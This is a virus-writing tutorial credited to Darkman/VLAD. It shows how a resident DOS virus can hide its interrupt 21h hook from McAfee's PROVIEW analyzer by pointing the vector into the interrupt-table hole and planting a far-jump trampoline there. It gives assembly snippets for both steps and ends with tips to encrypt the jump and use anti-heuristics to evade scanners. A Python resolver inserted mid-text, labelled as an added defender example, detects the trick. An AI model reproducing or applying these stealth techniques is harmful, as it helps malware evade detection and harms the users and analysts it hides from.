T R I C K I N G P R O V I E W
Written by
Darkman/VLAD
------------
Introduction
------------
This document shows how to trick PROVIEW by changing the address of
interrupt 21h so that it points into the hole in memory after the interrupt
table. In that memory hole we place a far jump to the virus code, and the
virus code returns to the original interrupt 21h.
-----------
Information
-----------
Analysing the interrupt vectors with PROVIEW usually looks something like
this:
No  T  Interrupt Name      Address    Points to
21  û  DOS Function call   0021:40F8  DOS CODE
When a virus is resident, the analysis of the interrupt vectors with
PROVIEW will usually look something like this:
No  T  Interrupt Name      Address    Points to
21  û  DOS Function call   9FC8:0062  !!! Unknown !!!
When a virus which tricks PROVIEW is resident, the analysis of the
interrupt vectors with PROVIEW will look like this:
No  T  Interrupt Name      Address    Points to
21  û  DOS Function call   001E:0000  Interrupt Vector Table
-------------------------------
McAfee Associates about PROVIEW
-------------------------------
PROVIEW (tm) Integrated System Analyzer and Viewer
Copyright (C) 1992 - 1993 by McAfee Associates
All rights reserved
PROVIEW is a menu driven program used to analyze, view
and edit the basic components of a system, including the
system memory, system interrupts, device drivers, and
installed disk drive sectors and file contents. PROVIEW
will allow you to view system elements in HEX, ASCII or
disassembled code format. Full searching and editing
functions are included.
Interrupts
View/Edit the System Interrupt Vectors. Proview
indicates which ones are currently in use, their
memory addresses, owners and interrupt chains.
You may display/edit the actual interrupt code in
hex or ASM format.
--------------------
How to trick PROVIEW
--------------------
The following steps must be followed to trick PROVIEW:
1. Load and store address of interrupt 21h.
2. Create a jump far in the memory hole.
---------------------------------------
Load and store address of interrupt 21h
---------------------------------------
The code below shows an example of how to load and store the address of
interrupt 21h:
;------------------------------------------------------------=< cut here >=-
xor ax,ax ; Clear AX
mov ds,ax ; DS = segment of interrupt table
xchg ax,ds:[21h*04h] ; Load and store offset of INT 21h
mov es:[int21off],ax ; Store offset of INT 21h
mov ax,1eh ; AX = segment of hole in memory
xchg ax,ds:[21h*04h+02h] ; Load and store segment of INT 21h
mov es:[int21seg],ax ; Store segment of INT 21h
;------------------------------------------------------------=< cut here >=-
This code presumes that two word variables called int21off and int21seg
exist.
------------------------------------
Create a jump far in the memory hole
------------------------------------
The code below shows an example of how to create a far jump in the memory
hole:
;------------------------------------------------------------=< cut here >=-
mov byte ptr ds:[1e0h],0eah ; 0EAh = opcode of JMP FAR (ptr16:16)
mov word ptr ds:[1e1h],offset virusint21 ; Store offset of virusint21
mov ds:[1e3h],es ; Store segment of virusint21
;------------------------------------------------------------=< cut here >=-
This code presumes that a procedure called virusint21 exists.
----------------------------------------------------
Necessary labels, variables and code to the examples
----------------------------------------------------
The above examples presume that two word variables called int21off and
int21seg exist. These variables hold the address of the original
interrupt 21h.
The above examples presume that a procedure called virusint21 exists. This
procedure is the virus's interrupt 21h handler.
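The weakness this article exploits is that PROVIEW stops at the first hop: a vector that lands inside the interrupt vector table is reported as "Interrupt Vector Table" and never followed. The resolver below is an added example, not code from the VLAD article, showing the check an analyzer (or a memory-forensics script) should perform instead: read the vector, notice when it points back into the IVT, follow any far JMP (opcode 0EAh) planted there, and report the real handler. The three memory images it builds are constructed sample data using the addresses from the listings above (0021:40F8, 9FC8:0062 and 001E:0000); the function names are this example's own.

```python
# Added example (not part of the VLAD article): a defender-side vector
# resolver that follows a far-JMP trampoline planted inside the IVT.
# All memory contents below are constructed sample data.

IVT_END = 0x400            # 256 vectors * 4 bytes: linear 00000h-003FFh
JMP_FAR = 0xEA             # opcode of JMP ptr16:16, encoded EA oo oo ss ss
MAX_HOPS = 8               # bound on how many trampolines we chase


def linear(seg, off):
    """Real-mode segment:offset -> 20-bit linear address."""
    return ((seg << 4) + off) & 0xFFFFF


def read_vector(mem, intno):
    """Return (segment, offset) of interrupt intno from the IVT in mem."""
    base = intno * 4
    off = mem[base] | (mem[base + 1] << 8)
    seg = mem[base + 2] | (mem[base + 3] << 8)
    return seg, off


def resolve_vector(mem, intno):
    """Resolve INT intno to its real handler.

    Returns (seg, off, findings). findings lists anything suspicious seen
    on the way; an empty list means the vector was taken at face value.
    """
    seg, off = read_vector(mem, intno)
    findings = []
    for _ in range(MAX_HOPS):
        addr = linear(seg, off)
        if addr >= IVT_END:
            break                      # normal case: handler lies outside the IVT
        findings.append(
            f"INT {intno:02X}h vector {seg:04X}:{off:04X} points inside the IVT "
            f"(slot of INT {addr // 4:02X}h)")
        if mem[addr] != JMP_FAR:
            findings.append("no far JMP at that address; treating as a dead vector")
            break
        # Decode the JMP FAR operand: offset word, then segment word.
        off = mem[addr + 1] | (mem[addr + 2] << 8)
        seg = mem[addr + 3] | (mem[addr + 4] << 8)
        findings.append(f"far JMP trampoline -> {seg:04X}:{off:04X}")
    return seg, off, findings


# --- constructed sample images mirroring the three PROVIEW listings above ---

def set_vector(mem, intno, seg, off):
    base = intno * 4
    mem[base:base + 4] = bytes([off & 0xFF, off >> 8, seg & 0xFF, seg >> 8])


def write_far_jmp(mem, addr, seg, off):
    mem[addr:addr + 5] = bytes([JMP_FAR, off & 0xFF, off >> 8, seg & 0xFF, seg >> 8])


def sample_images():
    """Three 64 KiB low-memory images: clean, plainly hooked, hidden hook."""
    clean = bytearray(0x10000)
    set_vector(clean, 0x21, 0x0021, 0x40F8)        # first listing above

    hooked = bytearray(0x10000)
    set_vector(hooked, 0x21, 0x9FC8, 0x0062)       # second listing above

    hidden = bytearray(0x10000)
    set_vector(hidden, 0x21, 0x001E, 0x0000)       # third listing: aimed at the IVT
    write_far_jmp(hidden, linear(0x001E, 0x0000), 0x9FC8, 0x0062)
    return {"clean": clean, "hooked": hooked, "hidden": hidden}


def report(name, mem):
    seg, off, findings = resolve_vector(mem, 0x21)
    print(f"{name:>7}: INT 21h really lands at {seg:04X}:{off:04X}")
    for line in findings:
        print("         " + line)


if __name__ == "__main__":
    for name, mem in sample_images().items():
        report(name, mem)
```

Two things the output makes visible that the PROVIEW listing hides: the hidden image resolves to the same 9FC8:0062 as the plainly hooked one, and the trampoline at linear 1E0h sits in the slots of INT 78h and INT 79h, so a scan of normally unused vectors that expects them to be 0000:0000 will also flag it.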
---------------------
Final tips and tricks
---------------------
- Encrypt the far jump in the memory hole, so PROVIEW can't disassemble
it.
- Use a lot of anti-heuristics, so other programs can't find the virus either.
- Remember to optimize your code.